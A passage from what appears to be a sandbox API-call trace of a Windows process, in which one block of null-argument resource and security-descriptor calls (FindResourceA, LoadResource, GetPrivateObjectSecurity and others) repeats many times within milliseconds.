GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.983] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.983] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.983] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.983] LockResource (hResData=0x0) returned 0x0 [0219.983] FreeResource (hResData=0x0) returned 0 [0219.983] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.983] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.983] LockResource (hResData=0x0) returned 0x0 [0219.983] FreeResource (hResData=0x0) returned 0 [0219.983] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.983] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.983] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.983] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.983] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.983] LockResource (hResData=0x0) returned 0x0 [0219.983] FreeResource (hResData=0x0) returned 0 [0219.983] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.983] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.983] LockResource (hResData=0x0) returned 0x0 [0219.983] FreeResource (hResData=0x0) returned 0 [0219.983] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.983] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.983] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.983] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.983] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.983] LockResource (hResData=0x0) returned 0x0 [0219.983] FreeResource (hResData=0x0) returned 0 [0219.983] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.983] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.983] LockResource (hResData=0x0) returned 0x0 [0219.983] FreeResource (hResData=0x0) returned 0 [0219.983] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.984] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.984] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.984] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.984] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.984] LockResource (hResData=0x0) returned 0x0 [0219.984] FreeResource (hResData=0x0) returned 0 [0219.984] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.984] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.984] LockResource (hResData=0x0) returned 0x0 [0219.984] FreeResource (hResData=0x0) returned 0 [0219.984] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.984] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.984] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.984] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.984] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.984] LockResource (hResData=0x0) returned 0x0 [0219.984] FreeResource (hResData=0x0) returned 0 [0219.984] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.984] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.984] LockResource (hResData=0x0) returned 0x0 [0219.984] FreeResource (hResData=0x0) returned 0 [0219.984] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.984] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.984] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.984] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.984] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.984] LockResource (hResData=0x0) returned 0x0 [0219.984] FreeResource (hResData=0x0) returned 0 [0219.984] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.984] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.984] LockResource (hResData=0x0) returned 0x0 [0219.984] FreeResource (hResData=0x0) returned 0 [0219.984] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.984] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.984] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.984] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.984] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.984] LockResource (hResData=0x0) returned 0x0 [0219.984] FreeResource (hResData=0x0) returned 0 [0219.984] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.984] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.984] LockResource (hResData=0x0) returned 0x0 [0219.984] FreeResource (hResData=0x0) returned 0 [0219.985] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.985] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.985] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.985] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.985] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.985] LockResource (hResData=0x0) returned 0x0 [0219.985] FreeResource (hResData=0x0) returned 0 [0219.985] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.985] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.985] LockResource (hResData=0x0) returned 0x0 [0219.985] FreeResource (hResData=0x0) returned 0 [0219.985] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.985] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.985] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.985] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.985] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.985] LockResource (hResData=0x0) returned 0x0 [0219.985] FreeResource (hResData=0x0) returned 0 [0219.985] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.985] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.985] LockResource (hResData=0x0) returned 0x0 [0219.985] FreeResource (hResData=0x0) returned 0 [0219.985] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.985] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.985] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.985] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.985] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.985] LockResource (hResData=0x0) returned 0x0 [0219.985] FreeResource (hResData=0x0) returned 0 [0219.985] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.985] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.985] LockResource (hResData=0x0) returned 0x0 [0219.985] FreeResource (hResData=0x0) returned 0 [0219.985] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.985] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.985] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.985] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.985] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.985] LockResource (hResData=0x0) returned 0x0 [0219.985] FreeResource (hResData=0x0) returned 0 [0219.985] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.985] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.985] LockResource (hResData=0x0) returned 0x0 [0219.985] FreeResource (hResData=0x0) returned 0 [0219.985] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.985] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.986] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.986] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.986] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.986] LockResource (hResData=0x0) returned 0x0 [0219.986] FreeResource (hResData=0x0) returned 0 [0219.986] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.986] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.986] LockResource (hResData=0x0) returned 0x0 [0219.986] FreeResource (hResData=0x0) returned 0 [0219.986] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.986] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.986] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.986] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.986] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.986] LockResource (hResData=0x0) returned 0x0 [0219.986] FreeResource (hResData=0x0) returned 0 [0219.986] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.986] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.986] LockResource (hResData=0x0) returned 0x0 [0219.986] FreeResource (hResData=0x0) returned 0 [0219.986] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.986] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.986] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.986] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.986] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.986] LockResource (hResData=0x0) returned 0x0 [0219.986] FreeResource (hResData=0x0) returned 0 [0219.986] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.986] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.986] LockResource (hResData=0x0) returned 0x0 [0219.986] FreeResource (hResData=0x0) returned 0 [0219.986] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.986] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.986] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.986] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.986] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.986] LockResource (hResData=0x0) returned 0x0 [0219.986] FreeResource (hResData=0x0) returned 0 [0219.986] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.986] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.986] LockResource (hResData=0x0) returned 0x0 [0219.986] FreeResource (hResData=0x0) returned 0 [0219.987] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.987] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.987] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.987] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.987] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.987] LockResource (hResData=0x0) returned 0x0 [0219.987] FreeResource (hResData=0x0) returned 0 [0219.987] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.987] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.987] LockResource (hResData=0x0) returned 0x0 [0219.987] FreeResource (hResData=0x0) returned 0 [0219.987] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.987] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.987] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.987] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.987] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.987] LockResource (hResData=0x0) returned 0x0 [0219.987] FreeResource (hResData=0x0) returned 0 [0219.987] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.987] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.987] LockResource (hResData=0x0) returned 0x0 [0219.987] FreeResource (hResData=0x0) returned 0 [0219.987] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.987] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.987] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.987] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.987] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.987] LockResource (hResData=0x0) returned 0x0 [0219.987] FreeResource (hResData=0x0) returned 0 [0219.987] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.987] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.987] LockResource (hResData=0x0) returned 0x0 [0219.987] FreeResource (hResData=0x0) returned 0 [0219.987] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.987] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.987] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.987] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.987] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.987] LockResource (hResData=0x0) returned 0x0 [0219.987] FreeResource (hResData=0x0) returned 0 [0219.987] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.987] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.987] LockResource (hResData=0x0) returned 0x0 [0219.988] FreeResource (hResData=0x0) returned 0 [0219.988] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.988] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.988] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.988] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.988] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.988] LockResource (hResData=0x0) returned 0x0 [0219.988] FreeResource (hResData=0x0) returned 0 [0219.988] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.988] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.988] LockResource (hResData=0x0) returned 0x0 [0219.988] FreeResource (hResData=0x0) returned 0 [0219.988] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.988] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.988] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.988] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.988] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.988] LockResource (hResData=0x0) returned 0x0 [0219.988] FreeResource (hResData=0x0) returned 0 [0219.988] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.988] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.988] LockResource (hResData=0x0) returned 0x0 [0219.988] FreeResource (hResData=0x0) returned 0 [0219.988] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.988] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.988] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.988] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.988] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.988] LockResource (hResData=0x0) returned 0x0 [0219.988] FreeResource (hResData=0x0) returned 0 [0219.988] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.988] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.988] LockResource (hResData=0x0) returned 0x0 [0219.988] FreeResource (hResData=0x0) returned 0 [0219.988] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.988] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.988] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.988] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.989] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.989] LockResource (hResData=0x0) returned 0x0 [0219.989] FreeResource (hResData=0x0) returned 0 [0219.989] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.989] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.989] LockResource (hResData=0x0) returned 0x0 [0219.989] FreeResource (hResData=0x0) returned 0 [0219.989] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.989] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.989] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.989] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.989] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.989] LockResource (hResData=0x0) returned 0x0 [0219.989] FreeResource (hResData=0x0) returned 0 [0219.989] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.989] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.989] LockResource (hResData=0x0) returned 0x0 [0219.989] FreeResource (hResData=0x0) returned 0 [0219.989] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.989] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.989] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.989] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.989] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.989] LockResource (hResData=0x0) returned 0x0 [0219.989] FreeResource (hResData=0x0) returned 0 [0219.990] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.990] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.990] LockResource (hResData=0x0) returned 0x0 [0219.990] FreeResource (hResData=0x0) returned 0 [0219.990] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.990] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.990] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.990] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.990] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.990] LockResource (hResData=0x0) returned 0x0 [0219.990] FreeResource (hResData=0x0) returned 0 [0219.990] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.990] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.990] LockResource (hResData=0x0) returned 0x0 [0219.990] FreeResource (hResData=0x0) returned 0 [0219.990] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.990] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.990] IsNLSDefinedString (Function=0x0, 